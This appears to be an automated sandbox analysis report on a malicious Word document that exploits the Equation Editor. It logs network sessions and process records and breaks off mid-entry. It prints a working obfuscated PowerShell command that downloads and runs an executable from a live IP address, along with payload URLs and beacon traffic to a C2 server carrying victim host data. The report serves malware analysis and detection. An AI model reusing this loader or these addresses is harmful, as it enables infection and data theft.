Nov 20, 2024 10:13:13.284693003 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 20, 2024 10:13:13.292586088 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 10:13:14.047805071 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 20 Nov 2024 09:13:13 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
105	192.168.2.22	49273	94.156.177.41	80	772	C:\Users\user\AppData\Roaming\wininit.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 10:13:14.186636925 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 20, 2024 10:13:14.191870928 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 10:13:14.920927048 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 20 Nov 2024 09:13:14 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
106	192.168.2.22	49274	94.156.177.41	80	772	C:\Users\user\AppData\Roaming\wininit.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 10:13:15.060734987 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 20, 2024 10:13:15.065941095 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 10:13:15.927126884 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 20 Nov 2024 09:13:15 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
107	192.168.2.22	49275	94.156.177.41	80	772	C:\Users\user\AppData\Roaming\wininit.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 10:13:16.074276924 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 20, 2024 10:13:16.079240084 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 10:13:16.829201937 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 20 Nov 2024 09:13:16 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
108	192.168.2.22	49276	94.156.177.41	80	772	C:\Users\user\AppData\Roaming\wininit.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 10:13:17.009215117 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 20, 2024 10:13:17.017319918 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 10:13:17.903618097 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 20 Nov 2024 09:13:17 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
109	192.168.2.22	49277	94.156.177.41	80	772	C:\Users\user\AppData\Roaming\wininit.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 10:13:18.051748037 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 20, 2024 10:13:18.056701899 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 10:13:18.831449032 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 20 Nov 2024 09:13:18 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
110	192.168.2.22	49278	94.156.177.41	80	772	C:\Users\user\AppData\Roaming\wininit.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 10:13:18.979660034 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 20, 2024 10:13:18.985728025 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 10:13:19.881263971 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 20 Nov 2024 09:13:19 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
111	192.168.2.22	49279	94.156.177.41	80	772	C:\Users\user\AppData\Roaming\wininit.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 10:13:20.023081064 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 20, 2024 10:13:20.030600071 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 10:13:20.786156893 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 20 Nov 2024 09:13:20 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port
112	192.168.2.22	49280	94.156.177.41	80

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 10:13:21.130464077 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 20, 2024 10:13:21.135704994 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 10:13:21.864723921 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 20 Nov 2024 09:13:21 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.22	49161	198.244.140.41	443	3292	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	Bytes transferred	Direction	Data
2024-11-20 09:11:03 UTC	131	OUT	OPTIONS / HTTP/1.1 User-Agent: Microsoft Office Protocol Discovery Host: provit.uk Content-Length: 0 Connection: Keep-Alive
2024-11-20 09:11:03 UTC	408	IN	HTTP/1.1 200 OK Allow: GET,HEAD Content-Length: 8 Content-Type: text/html; charset=utf-8 Date: Wed, 20 Nov 2024 09:11:03 GMT Etag: W/"8-ZRAf8oNBS3Bjb/SU2GYZCmbtmXg" Strict-Transport-Security: max-age=15552000; includeSubDomains X-Content-Type-Options: nosniff X-Dns-Prefetch-Control: off X-Download-Options: noopen X-Frame-Options: SAMEORIGIN X-Xss-Protection: 1; mode=block Connection: close
2024-11-20 09:11:03 UTC	8	IN	Data Raw: 47 45 54 2c 48 45 41 44 Data Ascii: GET,HEAD

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.22	49162	198.244.140.41	443	3292	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	Bytes transferred	Direction	Data
2024-11-20 09:11:04 UTC	190	OUT	HEAD /Ib9yLe?&shoelace=strong&skyscraper=discreet&roll=thoughtful&mimosa=wacky&vulture HTTP/1.1 Connection: Keep-Alive User-Agent: Microsoft Office Existence Discovery Host: provit.uk
2024-11-20 09:11:04 UTC	552	IN	HTTP/1.1 302 Found Content-Length: 192 Content-Type: text/plain; charset=utf-8 Date: Wed, 20 Nov 2024 09:11:04 GMT Location: http://66.63.187.231/xampp/wer/we/seemybestoptionforentiretimegivenmebackwith______suchagreatthignswithentiretimewithmegood______seethebestthignsalwaysgivnebestthigns.doc Strict-Transport-Security: max-age=15552000; includeSubDomains Vary: Accept X-Content-Type-Options: nosniff X-Dns-Prefetch-Control: off X-Download-Options: noopen X-Frame-Options: SAMEORIGIN X-Xss-Protection: 1; mode=block Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port
2	192.168.2.22	49163	198.244.140.41	443

Timestamp	Bytes transferred	Direction	Data
2024-11-20 09:11:09 UTC	126	OUT	OPTIONS / HTTP/1.1 Connection: Keep-Alive User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601 translate: f Host: provit.uk
2024-11-20 09:11:09 UTC	408	IN	HTTP/1.1 200 OK Allow: GET,HEAD Content-Length: 8 Content-Type: text/html; charset=utf-8 Date: Wed, 20 Nov 2024 09:11:09 GMT Etag: W/"8-ZRAf8oNBS3Bjb/SU2GYZCmbtmXg" Strict-Transport-Security: max-age=15552000; includeSubDomains X-Content-Type-Options: nosniff X-Dns-Prefetch-Control: off X-Download-Options: noopen X-Frame-Options: SAMEORIGIN X-Xss-Protection: 1; mode=block Connection: close
2024-11-20 09:11:09 UTC	8	IN	Data Raw: 47 45 54 2c 48 45 41 44 Data Ascii: GET,HEAD

Session ID	Source IP	Source Port	Destination IP	Destination Port
3	192.168.2.22	49164	198.244.140.41	443

Timestamp	Bytes transferred	Direction	Data
2024-11-20 09:11:10 UTC	156	OUT	Data Raw: 50 52 4f 50 46 49 4e 44 20 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 36 2e 31 2e 37 36 30 31 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 70 72 6f 76 69 74 2e 75 6b 0d 0a 0d 0a Data Ascii: PROPFIND / HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: provit.uk
2024-11-20 09:11:10 UTC	404	IN	HTTP/1.1 404 Not Found Content-Length: 144 Content-Security-Policy: default-src 'none' Content-Type: text/html; charset=utf-8 Date: Wed, 20 Nov 2024 09:11:10 GMT Strict-Transport-Security: max-age=15552000; includeSubDomains X-Content-Type-Options: nosniff X-Dns-Prefetch-Control: off X-Download-Options: noopen X-Frame-Options: SAMEORIGIN X-Xss-Protection: 1; mode=block Connection: close
2024-11-20 09:11:10 UTC	144	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 70 72 65 3e 43 61 6e 6e 6f 74 20 50 52 4f 50 46 49 4e 44 20 2f 3c 2f 70 72 65 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><title>Error</title></head><body><pre>Cannot PROPFIND /</pre></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
4	192.168.2.22	49165	198.244.140.41	443

Timestamp	Bytes transferred	Direction	Data
2024-11-20 09:11:11 UTC	156	OUT	Data Raw: 50 52 4f 50 46 49 4e 44 20 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 36 2e 31 2e 37 36 30 31 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 70 72 6f 76 69 74 2e 75 6b 0d 0a 0d 0a Data Ascii: PROPFIND / HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: provit.uk
2024-11-20 09:11:11 UTC	404	IN	HTTP/1.1 404 Not Found Content-Length: 144 Content-Security-Policy: default-src 'none' Content-Type: text/html; charset=utf-8 Date: Wed, 20 Nov 2024 09:11:11 GMT Strict-Transport-Security: max-age=15552000; includeSubDomains X-Content-Type-Options: nosniff X-Dns-Prefetch-Control: off X-Download-Options: noopen X-Frame-Options: SAMEORIGIN X-Xss-Protection: 1; mode=block Connection: close
2024-11-20 09:11:11 UTC	144	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 70 72 65 3e 43 61 6e 6e 6f 74 20 50 52 4f 50 46 49 4e 44 20 2f 3c 2f 70 72 65 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><title>Error</title></head><body><pre>Cannot PROPFIND /</pre></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.22	49166	198.244.140.41	443	3292	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	Bytes transferred	Direction	Data
2024-11-20 09:11:12 UTC	420	OUT	GET /Ib9yLe?&shoelace=strong&skyscraper=discreet&roll=thoughtful&mimosa=wacky&vulture HTTP/1.1 Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14) UA-CPU: AMD64 Accept-Encoding: gzip, deflate Host: provit.uk Connection: Keep-Alive
2024-11-20 09:11:12 UTC	540	IN	HTTP/1.1 302 Found Content-Length: 192 Content-Type: text/plain; charset=utf-8 Date: Wed, 20 Nov 2024 09:11:12 GMT Location: http://66.63.187.231/xampp/wer/we/seemybestoptionforentiretimegivenmebackwith______suchagreatthignswithentiretimewithmegood______seethebestthignsalwaysgivnebestthigns.doc Strict-Transport-Security: max-age=15552000; includeSubDomains Vary: Accept X-Content-Type-Options: nosniff X-Dns-Prefetch-Control: off X-Download-Options: noopen X-Frame-Options: SAMEORIGIN X-Xss-Protection: 0 Connection: close
2024-11-20 09:11:12 UTC	192	IN	Data Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 36 36 2e 36 33 2e 31 38 37 2e 32 33 31 2f 78 61 6d 70 70 2f 77 65 72 2f 77 65 2f 73 65 65 6d 79 62 65 73 74 6f 70 74 69 6f 6e 66 6f 72 65 6e 74 69 72 65 74 69 6d 65 67 69 76 65 6e 6d 65 62 61 63 6b 77 69 74 68 5f 5f 5f 5f 5f 5f 73 75 63 68 61 67 72 65 61 74 74 68 69 67 6e 73 77 69 74 68 65 6e 74 69 72 65 74 69 6d 65 77 69 74 68 6d 65 67 6f 6f 64 5f 5f 5f 5f 5f 5f 73 65 65 74 68 65 62 65 73 74 74 68 69 67 6e 73 61 6c 77 61 79 73 67 69 76 6e 65 62 65 73 74 74 68 69 67 6e 73 2e 64 6f 63 Data Ascii: Found. Redirecting to http://66.63.187.231/xampp/wer/we/seemybestoptionforentiretimegivenmebackwith______suchagreatthignswithentiretimewithmegood______seethebestthignsalwaysgivnebestthigns.doc

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.22	49168	198.244.140.41	443	3292	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	Bytes transferred	Direction	Data
2024-11-20 09:11:14 UTC	209	OUT	HEAD /Ib9yLe?&shoelace=strong&skyscraper=discreet&roll=thoughtful&mimosa=wacky&vulture HTTP/1.1 User-Agent: Microsoft Office Existence Discovery Host: provit.uk Content-Length: 0 Connection: Keep-Alive
2024-11-20 09:11:15 UTC	552	IN	HTTP/1.1 302 Found Content-Length: 192 Content-Type: text/plain; charset=utf-8 Date: Wed, 20 Nov 2024 09:11:14 GMT Location: http://66.63.187.231/xampp/wer/we/seemybestoptionforentiretimegivenmebackwith______suchagreatthignswithentiretimewithmegood______seethebestthignsalwaysgivnebestthigns.doc Strict-Transport-Security: max-age=15552000; includeSubDomains Vary: Accept X-Content-Type-Options: nosniff X-Dns-Prefetch-Control: off X-Download-Options: noopen X-Frame-Options: SAMEORIGIN X-Xss-Protection: 1; mode=block Connection: close

Target ID:	0
Start time:	04:10:59
Start date:	20/11/2024
Path:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Imagebase:	0x13f6f0000
File size:	1'423'704 bytes
MD5 hash:	9EE74859D22DAE61F1750B3A1BACB6F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	04:11:14
Start date:	20/11/2024
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Imagebase:	0x400000
File size:	543'304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	04:11:16
Start date:	20/11/2024
Path:	C:\Windows\SysWOW64\mshta.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\mshta.exe" "C:\Users\user\AppData\Roaming\goodtoseeuthatgreatthingswithentirethingsgreatf.hta"
Imagebase:	0x13b0000
File size:	13'312 bytes
MD5 hash:	ABDFC692D9FE43E2BA8FE6CB5A8CB95A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	04:11:17
Start date:	20/11/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SYSTEm32\WINDOwSPOWershELL\V1.0\poWERShell.eXe" "poWershELl.ExE -eX bypAss -nOP -W 1 -C deViCEcrEDEntiALdEplOYmeNt ; InvOKe-EXpreSSion($(iNvoke-EXpreSSIoN('[sYStem.TExT.eNcoDiNg]'+[CHar]0x3A+[chAr]58+'Utf8.gETsTriNg([systEm.coNvErT]'+[ChAR]0X3a+[CHAr]58+'fRoMbaSE64sTRinG('+[ChaR]0x22+'JGozckggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtYmVyZGVGSW5pVElPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UkxNb04uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTE9ETWxJWUZIRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMcmQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtDTXYsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0t3aFNVZ0ZkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiUEtKbWRxIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMWVBocGZaVmggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGozckg6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly82Ni42My4xODcuMjMxLzMzL2Nhc3BvbC5leGUiLCIkRU52OkFQUERBVEFcd2luaW5pdC5leGUiLDAsMCk7U1RBUlQtU2xFRVAoMyk7aUV4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTnY6QVBQREFUQVx3aW5pbml0LmV4ZSI='+[CHAR]0x22+'))')))"
Imagebase:	0x3e0000
File size:	427'008 bytes
MD5 hash:	EB32C070E658937AA9FA9F3AE629B2B8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	04:11:19
Start date:	20/11/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX bypAss -nOP -W 1 -C deViCEcrEDEntiALdEplOYmeNt
Imagebase:	0x3e0000
File size:	427'008 bytes
MD5 hash:	EB32C070E658937AA9FA9F3AE629B2B8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	04:11:21
Start date:	20/11/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\b2mggwzy\b2mggwzy.cmdline"
Imagebase:	0x12d0000
File size:	2'140'808 bytes
MD5 hash:	F8F36858B9405FBE27377FD7E8FEC2F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	04:11:22
Start date:	20/11/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
Wow64 process (32bit):	true
